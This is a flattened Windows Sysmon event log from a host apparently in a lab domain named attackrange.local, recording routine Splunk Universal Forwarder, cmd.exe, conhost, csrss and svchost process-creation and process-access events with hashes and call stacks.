AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5EBD8912-8CD1-6151-3800-00000000FD01}3500C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool web list settings --no-log 10341000x80000000000000001053391Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.632{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD1-6151-3800-00000000FD01}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053390Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.632{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3800-00000000FD01}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053389Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.632{5EBD8912-8CD1-6151-3700-00000000FD01}34803484C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD1-6151-3800-00000000FD01}3500C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+6665|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+146d6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+d1d8|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053388Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.634{5EBD8912-8CD1-6151-3800-00000000FD01}3500C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool web list settings --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD1-6151-3700-00000000FD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001053387Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.616{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD1-6151-3700-00000000FD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053386Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.616{5EBD8912-8CBD-6151-0500-00000000FD01}416500C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3700-00000000FD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053385Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.616{5EBD8912-8CD1-6151-3600-00000000FD01}34683472C:\Windows\system32\cmd.exe{5EBD8912-8CD1-6151-3700-00000000FD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053384Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.622{5EBD8912-8CD1-6151-3700-00000000FD01}3480C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{5EBD8912-8CD1-6151-3600-00000000FD01}3468C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_args 10341000x80000000000000001053383Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.616{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD1-6151-3600-00000000FD01}3468C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053382Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.616{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3600-00000000FD01}3468C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053381Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.616{5EBD8912-8CD0-6151-3000-00000000FD01}19563432C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5EBD8912-8CD1-6151-3600-00000000FD01}3468C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+edcb8|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+d7d48|C:\Windows\System32\sechost.dll+14342|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053380Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.616{5EBD8912-8CD1-6151-3600-00000000FD01}3468C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal_extra_splunkd_service_argsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000001053379Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.601{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053378Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.601{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3500-00000000FD01}3436C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053377Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.601{5EBD8912-8CBD-6151-0A00-00000000FD01}624716C:\Windows\system32\services.exe{5EBD8912-8CD0-6151-3000-00000000FD01}1956C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\services.exe+1713f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053376Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053375Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053374Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053373Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053372Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053371Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053370Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053369Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053368Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053367Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CD1-6151-3300-00000000FD01}33563384C:\Windows\system32\conhost.exe{5EBD8912-8CD1-6151-3400-00000000FD01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053366Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD1-6151-3400-00000000FD01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053365Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.553{5EBD8912-8CD1-6151-3200-00000000FD01}33483352C:\Windows\system32\cmd.exe{5EBD8912-8CD1-6151-3400-00000000FD01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053364Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.547{5EBD8912-8CD1-6151-3400-00000000FD01}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe8.0.2splunk Applicationsplunk ApplicationSplunk Inc.splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvarsC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BA47934C1D8F8F5D495F67F9B6EF5D0B,SHA256=39A00C55E1BC2233DBEE2A3F2F8CB9BD3668275DCA5F83BD11958FAF50E8C8CE,IMPHASH=4D753DA340C903D8C30CD8B0CF2B73E3{5EBD8912-8CD1-6151-3200-00000000FD01}3348C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c "C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _RAW_envvars 10341000x80000000000000001053363Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053362Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:17.537{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053361Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 